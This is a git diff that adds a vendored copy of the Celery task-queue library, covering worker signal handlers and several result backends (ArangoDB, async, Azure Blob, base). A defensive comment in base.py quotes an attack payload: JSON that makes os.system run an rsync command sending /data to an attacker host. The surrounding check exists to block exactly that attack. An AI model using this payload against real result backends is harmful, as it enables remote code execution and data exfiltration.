handler if detached from terminal, + # so closing the terminal window doesn't restart the worker + # into the background. + if self.app.IS_macOS: + # macOS can't exec from a process using threads. + # See https://github.com/celery/celery/issues#issue/152 + install_HUP_not_supported_handler(worker) + else: + install_worker_restart_handler(worker) + install_worker_term_handler(worker) + install_worker_term_hard_handler(worker) + install_worker_int_handler(worker) + install_cry_handler() + install_rdb_handler() + + def macOS_proxy_detection_workaround(self): + """See https://github.com/celery/celery/issues#issue/161.""" + os.environ.setdefault('celery_dummy_proxy', 'set_by_celeryd') + + def set_process_status(self, info): + return platforms.set_mp_process_title( + 'celeryd', + info=f'{info} ({platforms.strargv(sys.argv)})', + hostname=self.hostname, + ) + + +def _shutdown_handler(worker, sig='TERM', how='Warm', + callback=None, exitcode=EX_OK): + def _handle_request(*args): + with in_sighandler(): + from celery.worker import state + if current_process()._name == 'MainProcess': + if callback: + callback(worker) + safe_say(f'worker: {how} shutdown (MainProcess)') + signals.worker_shutting_down.send( + sender=worker.hostname, sig=sig, how=how, + exitcode=exitcode, + ) + setattr(state, {'Warm': 'should_stop', + 'Cold': 'should_terminate'}[how], exitcode) + _handle_request.__name__ = str(f'worker_{how}') + platforms.signals[sig] = _handle_request + + +if REMAP_SIGTERM == "SIGQUIT": + install_worker_term_handler = partial( + _shutdown_handler, sig='SIGTERM', how='Cold', exitcode=EX_FAILURE, + ) +else: + install_worker_term_handler = partial( + _shutdown_handler, sig='SIGTERM', how='Warm', + ) + +if not is_jython: # pragma: no cover + install_worker_term_hard_handler = partial( + _shutdown_handler, sig='SIGQUIT', how='Cold', + exitcode=EX_FAILURE, + ) +else: # pragma: no cover + install_worker_term_handler = \ + install_worker_term_hard_handler = lambda *a, **kw: None + + +def on_SIGINT(worker): + safe_say('worker: Hitting Ctrl+C again will terminate all running tasks!') + install_worker_term_hard_handler(worker, sig='SIGINT') + + +if not is_jython: # pragma: no cover + install_worker_int_handler = partial( + _shutdown_handler, sig='SIGINT', callback=on_SIGINT, + exitcode=EX_FAILURE, + ) +else: # pragma: no cover + def install_worker_int_handler(*args, **kwargs): + pass + + +def _reload_current_worker(): + platforms.close_open_fds([ + sys.__stdin__, sys.__stdout__, sys.__stderr__, + ]) + os.execv(sys.executable, [sys.executable] + sys.argv) + + +def install_worker_restart_handler(worker, sig='SIGHUP'): + + def restart_worker_sig_handler(*args): + """Signal handler restarting the current python program.""" + set_in_sighandler(True) + safe_say(f"Restarting celery worker ({' '.join(sys.argv)})") + import atexit + atexit.register(_reload_current_worker) + from celery.worker import state + state.should_stop = EX_OK + platforms.signals[sig] = restart_worker_sig_handler + + +def install_cry_handler(sig='SIGUSR1'): + # PyPy does not have sys._current_frames + if is_pypy: # pragma: no cover + return + + def cry_handler(*args): + """Signal handler logging the stack-trace of all active threads.""" + with in_sighandler(): + safe_say(cry()) + platforms.signals[sig] = cry_handler + + +def install_rdb_handler(envvar='CELERY_RDBSIG', + sig='SIGUSR2'): # pragma: no cover + + def rdb_handler(*args): + """Signal handler setting a rdb breakpoint at the current frame.""" + with in_sighandler(): + from celery.contrib.rdb import _frame, set_trace + + # gevent does not pass standard signal handler args + frame = args[1] if args else _frame().f_back + set_trace(frame) + if os.environ.get(envvar): + platforms.signals[sig] = rdb_handler + + +def install_HUP_not_supported_handler(worker, sig='SIGHUP'): + + def warn_on_HUP_handler(signum, frame): + with in_sighandler(): + safe_say('{sig} not supported: Restarting with {sig} is ' + 'unstable on this platform!'.format(sig=sig)) + platforms.signals[sig] = warn_on_HUP_handler diff --git a/env/Lib/site-packages/celery/backends/__init__.py b/env/Lib/site-packages/celery/backends/__init__.py new file mode 100644 index 00000000..ae2b485a --- /dev/null +++ b/env/Lib/site-packages/celery/backends/__init__.py @@ -0,0 +1 @@ +"""Result Backends.""" diff --git a/env/Lib/site-packages/celery/backends/arangodb.py b/env/Lib/site-packages/celery/backends/arangodb.py new file mode 100644 index 00000000..cc9cc48d --- /dev/null +++ b/env/Lib/site-packages/celery/backends/arangodb.py @@ -0,0 +1,190 @@ +"""ArangoDb result store backend.""" + +# pylint: disable=W1202,W0703 + +from datetime import timedelta + +from kombu.utils.objects import cached_property +from kombu.utils.url import _parse_url + +from celery.exceptions import ImproperlyConfigured + +from .base import KeyValueStoreBackend + +try: + from pyArango import connection as py_arango_connection + from pyArango.theExceptions import AQLQueryError +except ImportError: + py_arango_connection = AQLQueryError = None + +__all__ = ('ArangoDbBackend',) + + +class ArangoDbBackend(KeyValueStoreBackend): + """ArangoDb backend. + + Sample url + "arangodb://username:password@host:port/database/collection" + *arangodb_backend_settings* is where the settings are present + (in the app.conf) + Settings should contain the host, port, username, password, database name, + collection name else the default will be chosen. + Default database name and collection name is celery. + + Raises + ------ + celery.exceptions.ImproperlyConfigured: + if module :pypi:`pyArango` is not available. + + """ + + host = '127.0.0.1' + port = '8529' + database = 'celery' + collection = 'celery' + username = None + password = None + # protocol is not supported in backend url (http is taken as default) + http_protocol = 'http' + verify = False + + # Use str as arangodb key not bytes + key_t = str + + def __init__(self, url=None, *args, **kwargs): + """Parse the url or load the settings from settings object.""" + super().__init__(*args, **kwargs) + + if py_arango_connection is None: + raise ImproperlyConfigured( + 'You need to install the pyArango library to use the ' + 'ArangoDb backend.', + ) + + self.url = url + + if url is None: + host = port = database = collection = username = password = None + else: + ( + _schema, host, port, username, password, + database_collection, _query + ) = _parse_url(url) + if database_collection is None: + database = collection = None + else: + database, collection = database_collection.split('/') + + config = self.app.conf.get('arangodb_backend_settings', None) + if config is not None: + if not isinstance(config, dict): + raise ImproperlyConfigured( + 'ArangoDb backend settings should be grouped in a dict', + ) + else: + config = {} + + self.host = host or config.get('host', self.host) + self.port = int(port or config.get('port', self.port)) + self.http_protocol = config.get('http_protocol', self.http_protocol) + self.verify = config.get('verify', self.verify) + self.database = database or config.get('database', self.database) + self.collection = \ + collection or config.get('collection', self.collection) + self.username = username or config.get('username', self.username) + self.password = password or config.get('password', self.password) + self.arangodb_url = "{http_protocol}://{host}:{port}".format( + http_protocol=self.http_protocol, host=self.host, port=self.port + ) + self._connection = None + + @property + def connection(self): + """Connect to the arangodb server.""" + if self._connection is None: + self._connection = py_arango_connection.Connection( + arangoURL=self.arangodb_url, username=self.username, + password=self.password, verify=self.verify + ) + return self._connection + + @property + def db(self): + """Database Object to the given database.""" + return self.connection[self.database] + + @cached_property + def expires_delta(self): + return timedelta(seconds=0 if self.expires is None else self.expires) + + def get(self, key): + if key is None: + return None + query = self.db.AQLQuery( + "RETURN DOCUMENT(@@collection, @key).task", + rawResults=True, + bindVars={ + "@collection": self.collection, + "key": key, + }, + ) + return next(query) if len(query) > 0 else None + + def set(self, key, value): + self.db.AQLQuery( + """ + UPSERT {_key: @key} + INSERT {_key: @key, task: @value} + UPDATE {task: @value} IN @@collection + """, + bindVars={ + "@collection": self.collection, + "key": key, + "value": value, + }, + ) + + def mget(self, keys): + if keys is None: + return + query = self.db.AQLQuery( + "FOR k IN @keys RETURN DOCUMENT(@@collection, k).task", + rawResults=True, + bindVars={ + "@collection": self.collection, + "keys": keys if isinstance(keys, list) else list(keys), + }, + ) + while True: + yield from query + try: + query.nextBatch() + except StopIteration: + break + + def delete(self, key): + if key is None: + return + self.db.AQLQuery( + "REMOVE {_key: @key} IN @@collection", + bindVars={ + "@collection": self.collection, + "key": key, + }, + ) + + def cleanup(self): + if not self.expires: + return + checkpoint = (self.app.now() - self.expires_delta).isoformat() + self.db.AQLQuery( + """ + FOR record IN @@collection + FILTER record.task.date_done < @checkpoint + REMOVE record IN @@collection + """, + bindVars={ + "@collection": self.collection, + "checkpoint": checkpoint, + }, + ) diff --git a/env/Lib/site-packages/celery/backends/asynchronous.py b/env/Lib/site-packages/celery/backends/asynchronous.py new file mode 100644 index 00000000..cedae501 --- /dev/null +++ b/env/Lib/site-packages/celery/backends/asynchronous.py @@ -0,0 +1,333 @@ +"""Async I/O backend support utilities.""" +import socket +import threading +import time +from collections import deque +from queue import Empty +from time import sleep +from weakref import WeakKeyDictionary + +from kombu.utils.compat import detect_environment + +from celery import states +from celery.exceptions import TimeoutError +from celery.utils.threads import THREAD_TIMEOUT_MAX + +__all__ = ( + 'AsyncBackendMixin', 'BaseResultConsumer', 'Drainer', + 'register_drainer', +) + +drainers = {} + + +def register_drainer(name): + """Decorator used to register a new result drainer type.""" + def _inner(cls): + drainers[name] = cls + return cls + return _inner + + +@register_drainer('default') +class Drainer: + """Result draining service.""" + + def __init__(self, result_consumer): + self.result_consumer = result_consumer + + def start(self): + pass + + def stop(self): + pass + + def drain_events_until(self, p, timeout=None, interval=1, on_interval=None, wait=None): + wait = wait or self.result_consumer.drain_events + time_start = time.monotonic() + + while 1: + # Total time spent may exceed a single call to wait() + if timeout and time.monotonic() - time_start >= timeout: + raise socket.timeout() + try: + yield self.wait_for(p, wait, timeout=interval) + except socket.timeout: + pass + if on_interval: + on_interval() + if p.ready: # got event on the wanted channel. + break + + def wait_for(self, p, wait, timeout=None): + wait(timeout=timeout) + + +class greenletDrainer(Drainer): + spawn = None + _g = None + _drain_complete_event = None # event, sended (and recreated) after every drain_events iteration + + def _create_drain_complete_event(self): + """create new self._drain_complete_event object""" + pass + + def _send_drain_complete_event(self): + """raise self._drain_complete_event for wakeup .wait_for""" + pass + + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self._started = threading.Event() + self._stopped = threading.Event() + self._shutdown = threading.Event() + self._create_drain_complete_event() + + def run(self): + self._started.set() + while not self._stopped.is_set(): + try: + self.result_consumer.drain_events(timeout=1) + self._send_drain_complete_event() + self._create_drain_complete_event() + except socket.timeout: + pass + self._shutdown.set() + + def start(self): + if not self._started.is_set(): + self._g = self.spawn(self.run) + self._started.wait() + + def stop(self): + self._stopped.set() + self._send_drain_complete_event() + self._shutdown.wait(THREAD_TIMEOUT_MAX) + + def wait_for(self, p, wait, timeout=None): + self.start() + if not p.ready: + self._drain_complete_event.wait(timeout=timeout) + + +@register_drainer('eventlet') +class eventletDrainer(greenletDrainer): + + def spawn(self, func): + from eventlet import sleep, spawn + g = spawn(func) + sleep(0) + return g + + def _create_drain_complete_event(self): + from eventlet.event import Event + self._drain_complete_event = Event() + + def _send_drain_complete_event(self): + self._drain_complete_event.send() + + +@register_drainer('gevent') +class geventDrainer(greenletDrainer): + + def spawn(self, func): + import gevent + g = gevent.spawn(func) + gevent.sleep(0) + return g + + def _create_drain_complete_event(self): + from gevent.event import Event + self._drain_complete_event = Event() + + def _send_drain_complete_event(self): + self._drain_complete_event.set() + self._create_drain_complete_event() + + +class AsyncBackendMixin: + """Mixin for backends that enables the async API.""" + + def _collect_into(self, result, bucket): + self.result_consumer.buckets[result] = bucket + + def iter_native(self, result, no_ack=True, **kwargs): + self._ensure_not_eager() + + results = result.results + if not results: + raise StopIteration() + + # we tell the result consumer to put consumed results + # into these buckets. + bucket = deque() + for node in results: + if not hasattr(node, '_cache'): + bucket.append(node) + elif node._cache: + bucket.append(node) + else: + self._collect_into(node, bucket) + + for _ in self._wait_for_pending(result, no_ack=no_ack, **kwargs): + while bucket: + node = bucket.popleft() + if not hasattr(node, '_cache'): + yield node.id, node.children + else: + yield node.id, node._cache + while bucket: + node = bucket.popleft() + yield node.id, node._cache + + def add_pending_result(self, result, weak=False, start_drainer=True): + if start_drainer: + self.result_consumer.drainer.start() + try: + self._maybe_resolve_from_buffer(result) + except Empty: + self._add_pending_result(result.id, result, weak=weak) + return result + + def _maybe_resolve_from_buffer(self, result): + result._maybe_set_cache(self._pending_messages.take(result.id)) + + def _add_pending_result(self, task_id, result, weak=False): + concrete, weak_ = self._pending_results + if task_id not in weak_ and result.id not in concrete: + (weak_ if weak else concrete)[task_id] = result + self.result_consumer.consume_from(task_id) + + def add_pending_results(self, results, weak=False): + self.result_consumer.drainer.start() + return [self.add_pending_result(result, weak=weak, start_drainer=False) + for result in results] + + def remove_pending_result(self, result): + self._remove_pending_result(result.id) + self.on_result_fulfilled(result) + return result + + def _remove_pending_result(self, task_id): + for mapping in self._pending_results: + mapping.pop(task_id, None) + + def on_result_fulfilled(self, result): + self.result_consumer.cancel_for(result.id) + + def wait_for_pending(self, result, + callback=None, propagate=True, **kwargs): + self._ensure_not_eager() + for _ in self._wait_for_pending(result, **kwargs): + pass + return result.maybe_throw(callback=callback, propagate=propagate) + + def _wait_for_pending(self, result, + timeout=None, on_interval=None, on_message=None, + **kwargs): + return self.result_consumer._wait_for_pending( + result, timeout=timeout, + on_interval=on_interval, on_message=on_message, + **kwargs + ) + + @property + def is_async(self): + return True + + +class BaseResultConsumer: + """Manager responsible for consuming result messages.""" + + def __init__(self, backend, app, accept, + pending_results, pending_messages): + self.backend = backend + self.app = app + self.accept = accept + self._pending_results = pending_results + self._pending_messages = pending_messages + self.on_message = None + self.buckets = WeakKeyDictionary() + self.drainer = drainers[detect_environment()](self) + + def start(self, initial_task_id, **kwargs): + raise NotImplementedError() + + def stop(self): + pass + + def drain_events(self, timeout=None): + raise NotImplementedError() + + def consume_from(self, task_id): + raise NotImplementedError() + + def cancel_for(self, task_id): + raise NotImplementedError() + + def _after_fork(self): + self.buckets.clear() + self.buckets = WeakKeyDictionary() + self.on_message = None + self.on_after_fork() + + def on_after_fork(self): + pass + + def drain_events_until(self, p, timeout=None, on_interval=None): + return self.drainer.drain_events_until( + p, timeout=timeout, on_interval=on_interval) + + def _wait_for_pending(self, result, + timeout=None, on_interval=None, on_message=None, + **kwargs): + self.on_wait_for_pending(result, timeout=timeout, **kwargs) + prev_on_m, self.on_message = self.on_message, on_message + try: + for _ in self.drain_events_until( + result.on_ready, timeout=timeout, + on_interval=on_interval): + yield + sleep(0) + except socket.timeout: + raise TimeoutError('The operation timed out.') + finally: + self.on_message = prev_on_m + + def on_wait_for_pending(self, result, timeout=None, **kwargs): + pass + + def on_out_of_band_result(self, message): + self.on_state_change(message.payload, message) + + def _get_pending_result(self, task_id): + for mapping in self._pending_results: + try: + return mapping[task_id] + except KeyError: + pass + raise KeyError(task_id) + + def on_state_change(self, meta, message): + if self.on_message: + self.on_message(meta) + if meta['status'] in states.READY_STATES: + task_id = meta['task_id'] + try: + result = self._get_pending_result(task_id) + except KeyError: + # send to buffer in case we received this result + # before it was added to _pending_results. + self._pending_messages.put(task_id, meta) + else: + result._maybe_set_cache(meta) + buckets = self.buckets + try: + # remove bucket for this result, since it's fulfilled + bucket = buckets.pop(result) + except KeyError: + pass + else: + # send to waiter via bucket + bucket.append(result) + sleep(0) diff --git a/env/Lib/site-packages/celery/backends/azureblockblob.py b/env/Lib/site-packages/celery/backends/azureblockblob.py new file mode 100644 index 00000000..862777b5 --- /dev/null +++ b/env/Lib/site-packages/celery/backends/azureblockblob.py @@ -0,0 +1,165 @@ +"""The Azure Storage Block Blob backend for Celery.""" +from kombu.utils import cached_property +from kombu.utils.encoding import bytes_to_str + +from celery.exceptions import ImproperlyConfigured +from celery.utils.log import get_logger + +from .base import KeyValueStoreBackend + +try: + import azure.storage.blob as azurestorage + from azure.core.exceptions import ResourceExistsError, ResourceNotFoundError + from azure.storage.blob import BlobServiceClient +except ImportError: + azurestorage = None + +__all__ = ("AzureBlockBlobBackend",) + +LOGGER = get_logger(__name__) +AZURE_BLOCK_BLOB_CONNECTION_PREFIX = 'azureblockblob://' + + +class AzureBlockBlobBackend(KeyValueStoreBackend): + """Azure Storage Block Blob backend for Celery.""" + + def __init__(self, + url=None, + container_name=None, + *args, + **kwargs): + super().__init__(*args, **kwargs) + + if azurestorage is None or azurestorage.__version__ < '12': + raise ImproperlyConfigured( + "You need to install the azure-storage-blob v12 library to" + "use the AzureBlockBlob backend") + + conf = self.app.conf + + self._connection_string = self._parse_url(url) + + self._container_name = ( + container_name or + conf["azureblockblob_container_name"]) + + self.base_path = conf.get('azureblockblob_base_path', '') + self._connection_timeout = conf.get( + 'azureblockblob_connection_timeout', 20 + ) + self._read_timeout = conf.get('azureblockblob_read_timeout', 120) + + @classmethod + def _parse_url(cls, url, prefix=AZURE_BLOCK_BLOB_CONNECTION_PREFIX): + connection_string = url[len(prefix):] + if not connection_string: + raise ImproperlyConfigured("Invalid URL") + + return connection_string + + @cached_property + def _blob_service_client(self): + """Return the Azure Storage Blob service client. + + If this is the first call to the property, the client is created and + the container is created if it doesn't yet exist. + + """ + client = BlobServiceClient.from_connection_string( + self._connection_string, + connection_timeout=self._connection_timeout, + read_timeout=self._read_timeout + ) + + try: + client.create_container(name=self._container_name) + msg = f"Container created with name {self._container_name}." + except ResourceExistsError: + msg = f"Container with name {self._container_name} already." \ + "exists. This will not be created." + LOGGER.info(msg) + + return client + + def get(self, key): + """Read the value stored at the given key. + + Args: + key: The key for which to read the value. + """ + key = bytes_to_str(key) + LOGGER.debug("Getting Azure Block Blob %s/%s", self._container_name, key) + + blob_client = self._blob_service_client.get_blob_client( + container=self._container_name, + blob=f'{self.base_path}{key}', + ) + + try: + return blob_client.download_blob().readall().decode() + except ResourceNotFoundError: + return None + + def set(self, key, value): + """Store a value for a given key. + + Args: + key: The key at which to store the value. + value: The value to store. + + """ + key = bytes_to_str(key) + LOGGER.debug(f"Creating azure blob at {self._container_name}/{key}") + + blob_client = self._blob_service_client.get_blob_client( + container=self._container_name, + blob=f'{self.base_path}{key}', + ) + + blob_client.upload_blob(value, overwrite=True) + + def mget(self, keys): + """Read all the values for the provided keys. + + Args: + keys: The list of keys to read. + + """ + return [self.get(key) for key in keys] + + def delete(self, key): + """Delete the value at a given key. + + Args: + key: The key of the value to delete. + + """ + key = bytes_to_str(key) + LOGGER.debug(f"Deleting azure blob at {self._container_name}/{key}") + + blob_client = self._blob_service_client.get_blob_client( + container=self._container_name, + blob=f'{self.base_path}{key}', + ) + + blob_client.delete_blob() + + def as_uri(self, include_password=False): + if include_password: + return ( + f'{AZURE_BLOCK_BLOB_CONNECTION_PREFIX}' + f'{self._connection_string}' + ) + + connection_string_parts = self._connection_string.split(';') + account_key_prefix = 'AccountKey=' + redacted_connection_string_parts = [ + f'{account_key_prefix}**' if part.startswith(account_key_prefix) + else part + for part in connection_string_parts + ] + + return ( + f'{AZURE_BLOCK_BLOB_CONNECTION_PREFIX}' + f'{";".join(redacted_connection_string_parts)}' + ) diff --git a/env/Lib/site-packages/celery/backends/base.py b/env/Lib/site-packages/celery/backends/base.py new file mode 100644 index 00000000..4216c3b3 --- /dev/null +++ b/env/Lib/site-packages/celery/backends/base.py @@ -0,0 +1,1110 @@ +"""Result backend base classes. + +- :class:`BaseBackend` defines the interface. + +- :class:`KeyValueStoreBackend` is a common base class + using K/V semantics like _get and _put. +""" +import sys +import time +import warnings +from collections import namedtuple +from datetime import datetime, timedelta +from functools import partial +from weakref import WeakValueDictionary + +from billiard.einfo import ExceptionInfo +from kombu.serialization import dumps, loads, prepare_accept_content +from kombu.serialization import registry as serializer_registry +from kombu.utils.encoding import bytes_to_str, ensure_bytes +from kombu.utils.url import maybe_sanitize_url + +import celery.exceptions +from celery import current_app, group, maybe_signature, states +from celery._state import get_current_task +from celery.app.task import Context +from celery.exceptions import (BackendGetMetaError, BackendStoreError, ChordError, ImproperlyConfigured, + NotRegistered, SecurityError, TaskRevokedError, TimeoutError) +from celery.result import GroupResult, ResultBase, ResultSet, allow_join_result, result_from_tuple +from celery.utils.collections import BufferMap +from celery.utils.functional import LRUCache, arity_greater +from celery.utils.log import get_logger +from celery.utils.serialization import (create_exception_cls, ensure_serializable, get_pickleable_exception, + get_pickled_exception, raise_with_context) +from celery.utils.time import get_exponential_backoff_interval + +__all__ = ('BaseBackend', 'KeyValueStoreBackend', 'DisabledBackend') + +EXCEPTION_ABLE_CODECS = frozenset({'pickle'}) + +logger = get_logger(__name__) + +MESSAGE_BUFFER_MAX = 8192 + +pending_results_t = namedtuple('pending_results_t', ( + 'concrete', 'weak', +)) + +E_NO_BACKEND = """ +No result backend is configured. +Please see the documentation for more information. +""" + +E_CHORD_NO_BACKEND = """ +Starting chords requires a result backend to be configured. + +Note that a group chained with a task is also upgraded to be a chord, +as this pattern requires synchronization. + +Result backends that supports chords: Redis, Database, Memcached, and more. +""" + + +def unpickle_backend(cls, args, kwargs): + """Return an unpickled backend.""" + return cls(*args, app=current_app._get_current_object(), **kwargs) + + +class _nulldict(dict): + def ignore(self, *a, **kw): + pass + + __setitem__ = update = setdefault = ignore + + +def _is_request_ignore_result(request): + if request is None: + return False + return request.ignore_result + + +class Backend: + READY_STATES = states.READY_STATES + UNREADY_STATES = states.UNREADY_STATES + EXCEPTION_STATES = states.EXCEPTION_STATES + + TimeoutError = TimeoutError + + #: Time to sleep between polling each individual item + #: in `ResultSet.iterate`. as opposed to the `interval` + #: argument which is for each pass. + subpolling_interval = None + + #: If true the backend must implement :meth:`get_many`. + supports_native_join = False + + #: If true the backend must automatically expire results. + #: The daily backend_cleanup periodic task won't be triggered + #: in this case. + supports_autoexpire = False + + #: Set to true if the backend is persistent by default. + persistent = True + + retry_policy = { + 'max_retries': 20, + 'interval_start': 0, + 'interval_step': 1, + 'interval_max': 1, + } + + def __init__(self, app, + serializer=None, max_cached_results=None, accept=None, + expires=None, expires_type=None, url=None, **kwargs): + self.app = app + conf = self.app.conf + self.serializer = serializer or conf.result_serializer + (self.content_type, + self.content_encoding, + self.encoder) = serializer_registry._encoders[self.serializer] + cmax = max_cached_results or conf.result_cache_max + self._cache = _nulldict() if cmax == -1 else LRUCache(limit=cmax) + + self.expires = self.prepare_expires(expires, expires_type) + + # precedence: accept, conf.result_accept_content, conf.accept_content + self.accept = conf.result_accept_content if accept is None else accept + self.accept = conf.accept_content if self.accept is None else self.accept + self.accept = prepare_accept_content(self.accept) + + self.always_retry = conf.get('result_backend_always_retry', False) + self.max_sleep_between_retries_ms = conf.get('result_backend_max_sleep_between_retries_ms', 10000) + self.base_sleep_between_retries_ms = conf.get('result_backend_base_sleep_between_retries_ms', 10) + self.max_retries = conf.get('result_backend_max_retries', float("inf")) + self.thread_safe = conf.get('result_backend_thread_safe', False) + + self._pending_results = pending_results_t({}, WeakValueDictionary()) + self._pending_messages = BufferMap(MESSAGE_BUFFER_MAX) + self.url = url + + def as_uri(self, include_password=False): + """Return the backend as an URI, sanitizing the password or not.""" + # when using maybe_sanitize_url(), "/" is added + # we're stripping it for consistency + if include_password: + return self.url + url = maybe_sanitize_url(self.url or '') + return url[:-1] if url.endswith(':///') else url + + def mark_as_started(self, task_id, **meta): + """Mark a task as started.""" + return self.store_result(task_id, meta, states.STARTED) + + def mark_as_done(self, task_id, result, + request=None, store_result=True, state=states.SUCCESS): + """Mark task as successfully executed.""" + if (store_result and not _is_request_ignore_result(request)): + self.store_result(task_id, result, state, request=request) + if request and request.chord: + self.on_chord_part_return(request, state, result) + + def mark_as_failure(self, task_id, exc, + traceback=None, request=None, + store_result=True, call_errbacks=True, + state=states.FAILURE): + """Mark task as executed with failure.""" + if store_result: + self.store_result(task_id, exc, state, + traceback=traceback, request=request) + if request: + # This task may be part of a chord + if request.chord: + self.on_chord_part_return(request, state, exc) + # It might also have chained tasks which need to be propagated to, + # this is most likely to be exclusive with being a direct part of a + # chord but we'll handle both cases separately. + # + # The `chain_data` try block here is a bit tortured since we might + # have non-iterable objects here in tests and it's easier this way. + try: + chain_data = iter(request.chain) + except (AttributeError, TypeError): + chain_data = tuple() + for chain_elem in chain_data: + # Reconstruct a `Context` object for the chained task which has + # enough information to for backends to work with + chain_elem_ctx = Context(chain_elem) + chain_elem_ctx.update(chain_elem_ctx.options) + chain_elem_ctx.id = chain_elem_ctx.options.get('task_id') + chain_elem_ctx.group = chain_elem_ctx.options.get('group_id') + # If the state should be propagated, we'll do so for all + # elements of the chain. This is only truly important so + # that the last chain element which controls completion of + # the chain itself is marked as completed to avoid stalls. + # + # Some chained elements may be complex signatures and have no + # task ID of their own, so we skip them hoping that not + # descending through them is OK. If the last chain element is + # complex, we assume it must have been uplifted to a chord by + # the canvas code and therefore the condition below will ensure + # that we mark something as being complete as avoid stalling. + if ( + store_result and state in states.PROPAGATE_STATES and + chain_elem_ctx.task_id is not None + ): + self.store_result( + chain_elem_ctx.task_id, exc, state, + traceback=traceback, request=chain_elem_ctx, + ) + # If the chain element is a member of a chord, we also need + # to call `on_chord_part_return()` as well to avoid stalls. + if 'chord' in chain_elem_ctx.options: + self.on_chord_part_return(chain_elem_ctx, state, exc) + # And finally we'll fire any errbacks + if call_errbacks and request.errbacks: + self._call_task_errbacks(request, exc, traceback) + + def _call_task_errbacks(self, request, exc, traceback): + old_signature = [] + for errback in request.errbacks: + errback = self.app.signature(errback) + if not errback._app: + # Ensure all signatures have an application + errback._app = self.app + try: + if ( + # Celery tasks type created with the @task decorator have + # the __header__ property, but Celery task created from + # Task class do not have this property. + # That's why we have to check if this property exists + # before checking is it partial function. + hasattr(errback.type, '__header__') and + + # workaround to support tasks with bind=True executed as + # link errors. Otherwise, retries can't be used + not isinstance(errback.type.__header__, partial) and + arity_greater(errback.type.__header__, 1) + ): + errback(request, exc, traceback) + else: + old_signature.append(errback) + except NotRegistered: + # Task may not be present in this worker. + # We simply send it forward for another worker to consume. + # If the task is not registered there, the worker will raise + # NotRegistered. + old_signature.append(errback) + + if old_signature: + # Previously errback was called as a task so we still + # need to do so if the errback only takes a single task_id arg. + task_id = request.id + root_id = request.root_id or task_id + g = group(old_signature, app=self.app) + if self.app.conf.task_always_eager or request.delivery_info.get('is_eager', False): + g.apply( + (task_id,), parent_id=task_id, root_id=root_id + ) + else: + g.apply_async( + (task_id,), parent_id=task_id, root_id=root_id + ) + + def mark_as_revoked(self, task_id, reason='', + request=None, store_result=True, state=states.REVOKED): + exc = TaskRevokedError(reason) + if store_result: + self.store_result(task_id, exc, state, + traceback=None, request=request) + if request and request.chord: + self.on_chord_part_return(request, state, exc) + + def mark_as_retry(self, task_id, exc, traceback=None, + request=None, store_result=True, state=states.RETRY): + """Mark task as being retries. + + Note: + Stores the current exception (if any). + """ + return self.store_result(task_id, exc, state, + traceback=traceback, request=request) + + def chord_error_from_stack(self, callback, exc=None): + app = self.app + try: + backend = app._tasks[callback.task].backend + except KeyError: + backend = self + # We have to make a fake request since either the callback failed or + # we're pretending it did since we don't have information about the + # chord part(s) which failed. This request is constructed as a best + # effort for new style errbacks and may be slightly misleading about + # what really went wrong, but at least we call them! + fake_request = Context({ + "id": callback.options.get("task_id"), + "errbacks": callback.options.get("link_error", []), + "delivery_info": dict(), + **callback + }) + try: + self._call_task_errbacks(fake_request, exc, None) + except Exception as eb_exc: # pylint: disable=broad-except + return backend.fail_from_current_stack(callback.id, exc=eb_exc) + else: + return backend.fail_from_current_stack(callback.id, exc=exc) + + def fail_from_current_stack(self, task_id, exc=None): + type_, real_exc, tb = sys.exc_info() + try: + exc = real_exc if exc is None else exc + exception_info = ExceptionInfo((type_, exc, tb)) + self.mark_as_failure(task_id, exc, exception_info.traceback) + return exception_info + finally: + while tb is not None: + try: + tb.tb_frame.clear() + tb.tb_frame.f_locals + except RuntimeError: + # Ignore the exception raised if the frame is still executing. + pass + tb = tb.tb_next + + del tb + + def prepare_exception(self, exc, serializer=None): + """Prepare exception for serialization.""" + serializer = self.serializer if serializer is None else serializer + if serializer in EXCEPTION_ABLE_CODECS: + return get_pickleable_exception(exc) + exctype = type(exc) + return {'exc_type': getattr(exctype, '__qualname__', exctype.__name__), + 'exc_message': ensure_serializable(exc.args, self.encode), + 'exc_module': exctype.__module__} + + def exception_to_python(self, exc): + """Convert serialized exception to Python exception.""" + if not exc: + return None + elif isinstance(exc, BaseException): + if self.serializer in EXCEPTION_ABLE_CODECS: + exc = get_pickled_exception(exc) + return exc + elif not isinstance(exc, dict): + try: + exc = dict(exc) + except TypeError as e: + raise TypeError(f"If the stored exception isn't an " + f"instance of " + f"BaseException, it must be a dictionary.\n" + f"Instead got: {exc}") from e + + exc_module = exc.get('exc_module') + try: + exc_type = exc['exc_type'] + except KeyError as e: + raise ValueError("Exception information must include " + "the exception type") from e + if exc_module is None: + cls = create_exception_cls( + exc_type, __name__) + else: + try: + # Load module and find exception class in that + cls = sys.modules[exc_module] + # The type can contain qualified name with parent classes + for name in exc_type.split('.'): + cls = getattr(cls, name) + except (KeyError, AttributeError): + cls = create_exception_cls(exc_type, + celery.exceptions.__name__) + exc_msg = exc.get('exc_message', '') + + # If the recreated exception type isn't indeed an exception, + # this is a security issue. Without the condition below, an attacker + # could exploit a stored command vulnerability to execute arbitrary + # python code such as: + # os.system("rsync /data attacker@192.168.56.100:~/data") + # The attacker sets the task's result to a failure in the result + # backend with the os as the module, the system function as the + # exception type and the payload + # rsync /data attacker@192.168.56.100:~/data + # as the exception arguments like so: + # { + # "exc_module": "os", + # "exc_type": "system", + # "exc_message": "rsync /data attacker@192.168.56.100:~/data" + # } + if not isinstance(cls, type) or not issubclass(cls, BaseException): + fake_exc_type = exc_type if exc_module is None else f'{exc_module}.{exc_type}' + raise SecurityError( + f"Expected an exception class, got {fake_exc_type} with payload {exc_msg}") + + # XXX: Without verifying `cls` is actually an exception class, + # an attacker could execute arbitrary python code. + # cls could be anything, even eval(). + try: + if isinstance(exc_msg, (tuple, list)): + exc = cls(*exc_msg) + else: + exc = cls(exc_msg) + except Exception as err: # noqa + exc = Exception(f'{cls}({exc_msg})') + + return exc + + def prepare_value(self, result): + """Prepare value for storage.""" + if self.serializer != 'pickle' and isinstance(result, ResultBase): + return result.as_tuple() + return result + + def encode(self, data): + _, _, payload = self._encode(data) + return payload + + def _encode(self, data): + return dumps(data, serializer=self.serializer) + + def meta_from_decoded(self, meta): + if meta['status'] in self.EXCEPTION_STATES: + meta['result'] = self.exception_to_python(meta['result']) + return meta + + def decode_result(self, payload): + return self.meta_from_decoded(self.decode(payload)) + + def decode(self, payload): + if payload is None: + return payload + payload = payload or str(payload) + return loads(payload, + content_type=self.content_type, + content_encoding=self.content_encoding, 